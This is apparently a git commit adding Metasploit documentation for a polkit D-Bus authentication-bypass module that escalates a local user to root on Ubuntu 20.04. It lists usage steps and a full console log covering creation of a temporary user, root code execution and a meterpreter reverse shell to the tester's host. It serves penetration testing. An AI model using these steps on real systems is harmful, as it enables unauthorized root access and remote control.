Module updates + Docs

2021-06-25 18:00:08 -04:00
parent 8d2d445699
commit f87f831aba
2 changed files with 178 additions and 42 deletions
@@ -0,0 +1,96 @@
+## Description
+
+This module exploits a authentication bypass in Linux machines that make use of the polkit is a system service.
+The vulnerability enables an unprivileged local user to get a root shell on the system.
+
+## Vulnerable Application
+This module has been tested successfully on:
+    
+* Ubuntu 20.04
+
+### Installation And Setup
+
+Download and install Ubuntu 20.04 from the Ubuntu Downloads page: https://ubuntu.com/download/desktop
+
+## Verification Steps
+1. Start msfconsole.
+2. Get a session.
+3. Do: `use exploit/linux/local/polkit_dbus_auth_bypass`.
+4. Set the `SESSION` to the session obtained in step 2.
+5. Set the `LHOST`, `LPORT` and `PAYLOAD` options as appropriate.
+6. Do: `run`.
+7. It is possible for the exploit to fail, increase the ITERATIONS module option to attempt the exploit more times before failing and run again.
+8. Enjoy the shell.
+
+## Options
+
+**SESSION**
+The session to run this module on.
+
+**WRITABLE_DIR**
+Directory to write file to (`%TEMP%` by default).
+
+**USERNAME**
+The name of the user the exploit will add to the system
+
+**PASSWORD**
+The password for the user to be created
+
+## Scenarios
+
+### Tested on Ubuntu 20.04
+```
+msf6 > use multi/handler
+[*] Using configured payload linux/x64/meterpreter_reverse_tcp
+msf6 exploit(multi/handler) > run
+
+[*] Started reverse TCP handler on 0.0.0.0:4444 
+[*] Meterpreter session 1 opened (192.168.123.1:4444 -> 192.168.123.146:49882) at 2021-06-25 17:54:45 -0400
+
+meterpreter > bg
+[*] Backgrounding session 1...
+msf6 exploit(multi/handler) > use polkit_dbus
+[*] No payload configured, defaulting to linux/x86/meterpreter/reverse_tcp
+
+Matching Modules
+================
+
+   #  Name                                         Disclosure Date  Rank       Check  Description
+   -  ----                                         ---------------  ----       -----  -----------
+   0  exploit/linux/local/polkit_dbus_auth_bypass  2021-06-03       excellent  Yes    Polkit Authentication Bypass
+
+
+Interact with a module by name or index. For example info 0, use 0 or use exploit/linux/local/polkit_dbus_auth_bypass
+
+[*] Using exploit/linux/local/polkit_dbus_auth_bypass
+msf6 exploit(linux/local/polkit_dbus_auth_bypass) > set lhost 192.168.123.1
+lhost => 192.168.123.1
+msf6 exploit(linux/local/polkit_dbus_auth_bypass) > set lport 4443
+lport => 4443
+msf6 exploit(linux/local/polkit_dbus_auth_bypass) > set session 1
+session => 1
+msf6 exploit(linux/local/polkit_dbus_auth_bypass) > run
+
+[*] Started reverse TCP handler on 192.168.123.1:4443 
+[*] Executing automatic check (disable AutoCheck to override)
+[+] The target is vulnerable. The polkit framework instance is vulnerable.
+[*] Attempting to create user msf
+[+] User msf created with UID 1019
+[*] Attempting to set the password of the newly create user, msf, to: NpJsQSti
+[+] Obtained code execution has root!
+[*] Writing '/tmp/vOWnn' (207 bytes) ...
+[*] Sending stage (984904 bytes) to 192.168.123.146
+[+] Deleted /tmp/vOWnn
+[*] Meterpreter session 2 opened (192.168.123.1:4443 -> 192.168.123.146:42066) at 2021-06-25 17:55:27 -0400
+[*] Attempting to remove the user added: 
+[+] Successfully removed msf
+
+meterpreter > getuid
+Server username: root @ ubuntu (uid=0, gid=0, euid=0, egid=0)
+meterpreter > sysinfo
+Computer     : 192.168.123.146
+OS           : Ubuntu 20.04 (Linux 5.8.0-55-generic)
+Architecture : x64
+BuildTuple   : i486-linux-musl
+Meterpreter  : x86/linux
+```